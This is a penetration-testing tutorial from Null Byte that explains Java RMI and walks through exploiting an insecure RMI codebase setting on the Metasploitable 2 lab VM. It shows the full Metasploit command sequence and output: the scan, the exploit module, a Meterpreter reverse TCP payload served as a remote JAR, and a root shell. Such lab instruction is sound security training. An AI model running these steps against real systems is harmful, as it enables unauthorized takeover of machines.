
How to Use Java Remote Method Invocation to Root «Null Byte :: WonderHowTo



In the world of technology there is often a trade-off between convenience and security, and Java Remote Method Invocation is a system where that trade-off is all too real. The ability of a Java program to communicate remotely with another program can greatly improve the usability of an application, but it can also create critical vulnerabilities that an attacker can exploit to compromise the host.

In this tutorial, we will use the Metasploit framework to attack an insecure instance of a Java RMI server on Metasploitable 2, a vulnerable virtual machine.

Introduction to Java RMI

Java Remote Method Invocation (Java RMI) is a mechanism that allows an object living in one Java Virtual Machine to access and invoke methods on an object living in another JVM. It is essentially a remote procedure call in an object-oriented rather than a procedural paradigm, and it enables communication between Java programs that do not share an address space.

One of the main features of RMI is that remote objects can dynamically load classes that the receiving side does not yet have, extending the behavior and functionality of an application. As we will see, this is also the feature that makes the attack possible.

RMI applications typically consist of two programs: a client and a server. The server creates remote objects and makes their methods available to the client. Communication is handled by two intermediate objects: the stub and the skeleton.

The stub lives on the client side and marshals the call to the server: an identifier for the remote object, the name of the method to invoke, and the method's parameters. The skeleton lives on the server and passes the client's request on to the remote object. Since Java 1.2 separate skeleton classes are no longer required, and since Java 5 stubs are generated dynamically, but the model is the same.

The vulnerability arises when the server runs with an insecure configuration that allows classes to be loaded from any remote URL (the RMI codebase). Because method calls to the registry do not require authentication, an attacker can send a call that references a class hosted on a server they control, and the target's class loader fetches and executes it. Note that this is the default only on old JREs: since Java 7u21 the system property java.rmi.server.useCodebaseOnly defaults to true, which stops the JVM from loading classes from a codebase supplied by the remote peer, so a current JVM is exposed only if that property has been explicitly set to false. The Metasploitable 2 instance we target here is old enough for the attack to work. Metasploit includes a module to scan for Java RMI endpoints and a module to actively exploit this vulnerability.

Search for Java RMI

Start Metasploit by typing msfconsole in the terminal. There is an auxiliary scanner we can use to determine whether the Java RMI vulnerability exists on our target. At the prompt, type search rmi and look for the module auxiliary/scanner/misc/java_rmi_server.

  msf > search rmi
  [!] Module database cache not built yet, using slow search

  Matching Modules
  ================

     Name                                       Disclosure Date  Rank       Description
     ----                                       ---------------  ----       -----------
     auxiliary/scanner/misc/java_rmi_server     2011-10-15       normal     Java RMI Server Insecure Endpoint Code Execution Scanner
     exploit/multi/misc/java_rmi_server         2011-10-15       excellent  Java RMI Server Insecure Default Configuration Java Code Execution

Next, type use auxiliary/scanner/misc/java_rmi_server to load the scanner, then enter options to view its settings.

  msf > use auxiliary/scanner/misc/java_rmi_server
  msf auxiliary(scanner/misc/java_rmi_server) > options

  Module options (auxiliary/scanner/misc/java_rmi_server):

     Name     Current Setting  Required  Description
     ----     ---------------  --------  -----------
     RHOSTS                    yes       The target address range or CIDR identifier
     RPORT    1099             yes       The target port (TCP)
     THREADS  1                yes       The number of concurrent threads

Now we need to specify the target by entering set rhosts 172.16.1.102 (use the IP address of your own target). We can also increase the number of threads so the scanner runs a little faster: enter set threads 16 to set the number of threads to 16, a reasonably safe value. Finally, enter run (an alias for exploit) to scan the target.

  msf auxiliary(scanner/misc/java_rmi_server) > set rhosts 172.16.1.102
  rhosts => 172.16.1.102
  msf auxiliary(scanner/misc/java_rmi_server) > set threads 16
  threads => 16
  msf auxiliary(scanner/misc/java_rmi_server) > run

  [+] 172.16.1.102:1099     - 172.16.1.102:1099 Java RMI Endpoint Detected: Class Loader Enabled
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed

We can see that the scanner detected a Java RMI endpoint on port 1099 and reports that the class loader is enabled, which indicates the target is likely vulnerable. Let's try exploiting it.

Exploit Java RMI

Back in our earlier search results, locate the exploit/multi/misc/java_rmi_server module and enter use exploit/multi/misc/java_rmi_server to load it. Now we can show the various options for this exploit.

  msf auxiliary(scanner/misc/java_rmi_server) > use exploit/multi/misc/java_rmi_server
  msf exploit(multi/misc/java_rmi_server) > options

  Module options (exploit/multi/misc/java_rmi_server):

     Name       Current Setting  Required  Description
     ----       ---------------  --------  -----------
     HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
     RHOST                       yes       The target address
     RPORT      1099             yes       The target port (TCP)
     SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
     SRVPORT    8080             yes       The local port to listen on.
     SSL        false            no        Negotiate SSL for incoming connections
     SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
     URIPATH                     no        The URI to use for this exploit (default is random)

  Exploit target:

     Id  Name
     --  ----
     0   Generic (Java Payload)

Type set rhost 172.16.1.102 (using the appropriate IP address) to specify the target. All other options can be left at their defaults for now. Next, use show payloads to display the payloads compatible with this exploit.

  msf exploit(multi/misc/java_rmi_server) > set rhost 172.16.1.102
  rhost => 172.16.1.102
  msf exploit(multi/misc/java_rmi_server) > show payloads

  Compatible Payloads
  ===================

     Name                              Disclosure Date  Rank    Description
     ----                              ---------------  ----    -----------
     generic/custom                                     normal  Custom Payload
     generic/shell_bind_tcp                             normal  Generic Command Shell, Bind TCP Inline
     generic/shell_reverse_tcp                          normal  Generic Command Shell, Reverse TCP Inline
     java/meterpreter/bind_tcp                          normal  Java Meterpreter, Java Bind TCP Stager
     java/meterpreter/reverse_http                      normal  Java Meterpreter, Java Reverse HTTP Stager
     java/meterpreter/reverse_https                     normal  Java Meterpreter, Java Reverse HTTPS Stager
     java/meterpreter/reverse_tcp                       normal  Java Meterpreter, Java Reverse TCP Stager
     java/shell/bind_tcp                                normal  Command Shell, Java Bind TCP Stager
     java/shell/reverse_tcp                             normal  Command Shell, Java Reverse TCP Stager
     java/shell_reverse_tcp                             normal  Java Command Shell, Reverse TCP Inline

We will use the almighty Meterpreter here, with a reverse TCP stager. Enter set payload java/meterpreter/reverse_tcp to select this payload.

  msf exploit(multi/misc/java_rmi_server) > set payload java/meterpreter/reverse_tcp
  payload => java/meterpreter/reverse_tcp

Let's review the current settings with options.

  msf exploit(multi/misc/java_rmi_server) > options

  Module options (exploit/multi/misc/java_rmi_server):

     Name       Current Setting  Required  Description
     ----       ---------------  --------  -----------
     HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
     RHOST      172.16.1.102     yes       The target address
     RPORT      1099             yes       The target port (TCP)
     SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
     SRVPORT    8080             yes       The local port to listen on.
     SSL        false            no        Negotiate SSL for incoming connections
     SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
     URIPATH                     no        The URI to use for this exploit (default is random)

  Payload options (java/meterpreter/reverse_tcp):

     Name   Current Setting  Required  Description
     ----   ---------------  --------  -----------
     LHOST                   yes       The listen address (an interface may be specified)
     LPORT  4444             yes       The listen port

  Exploit target:

     Id  Name
     --  ----
     0   Generic (Java Payload)

Since we are using a reverse shell, we need to specify the listening address. Enter set lhost 172.16.1.100 (the IP address of your attacking machine) and we should be good to go. Note that SRVHOST is 0.0.0.0 by default, so the exploit's HTTP server listens on all interfaces; the target must be able to reach it on SRVPORT (8080), since that is where it fetches the payload JAR from. Enter run to launch the exploit.

  msf exploit(multi/misc/java_rmi_server) > set lhost 172.16.1.100
  lhost => 172.16.1.100
  msf exploit(multi/misc/java_rmi_server) > run

  [*] Started reverse TCP handler on 172.16.1.100:4444
  [*] 172.16.1.102:1099 - Using URL: http://0.0.0.0:8080/ALLdcZ02dnZmL
  [*] 172.16.1.102:1099 - Local IP: http://172.16.1.100:8080/ALLdcZ02dnZmL
  [*] 172.16.1.102:1099 - Server started.
  [*] 172.16.1.102:1099 - Sending RMI Header...
  [*] 172.16.1.102:1099 - Sending RMI Call...
  [*] 172.16.1.102:1099 - Replied to request for payload JAR
  [*] Sending stage (53845 bytes) to 172.16.1.102
  [*] Meterpreter session 1 opened (172.16.1.100:4444 -> 172.16.1.102:38797) at 2018-09-25 11:35:32 -0500
  [*] 172.16.1.102:1099 - Server stopped.

  meterpreter >

We can see that the exploit started a handler on our machine, stood up the HTTP server hosting the payload JAR, sent the RMI header and method call to the target, served the JAR when the target's class loader requested it, and successfully opened a Meterpreter session. We can now use commands like getuid to see which user Meterpreter is running as on the target, and sysinfo to display information about the target.

  meterpreter > getuid
  Server username: root
  meterpreter > sysinfo
  Computer    : metasploitable
  OS          : Linux 2.6.24-16-server (i386)
  Meterpreter : java/linux

We can also drop into a system shell on the target with the shell command and, for example, run ip addr to see its interfaces.

  meterpreter > shell
  Process 1 created.
  Channel 1 created.
  ip addr
  1: lo: mtu 16436 qdisc noqueue
      link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
      inet 127.0.0.1/8 scope host lo
      inet6 ::1/128 scope host
         valid_lft forever preferred_lft forever
  2: eth0: mtu 1500 qdisc pfifo_fast qlen 1000
      link/ether 08:00:27:77:62:6c brd ff:ff:ff:ff:ff:ff
      inet 172.16.1.102/12 brd 172.31.255.255 scope global eth0
      inet6 fe80::a00:27ff:fe77:626c/64 scope link
         valid_lft forever preferred_lft forever

We are root at this point, and from here the world is our oyster, since we essentially have full control over the target. The RMI service on Metasploitable 2 runs as root, which is why the Java payload inherits that privilege; on a server where the RMI process runs as an unprivileged account, the same exploit would yield only that account's access.

Wrapping Up

Good intentions and the promise of improved functionality can often lead to vulnerabilities in an application, as we have seen here. Today we covered the basic architecture and behavior of Java Remote Method Invocation, how to determine whether the vulnerability is present, and how to exploit it with Metasploit to ultimately gain root access to the target. We were able to own the entire system essentially because of an insecure configuration: a remotely reachable, unauthenticated RMI registry that is allowed to load classes from a codebase chosen by the caller.

Don't Miss: The Ultimate Command Cheat Sheet for Metasploit's Meterpreter

Cover image by Daria-Yakovleva/Pixabay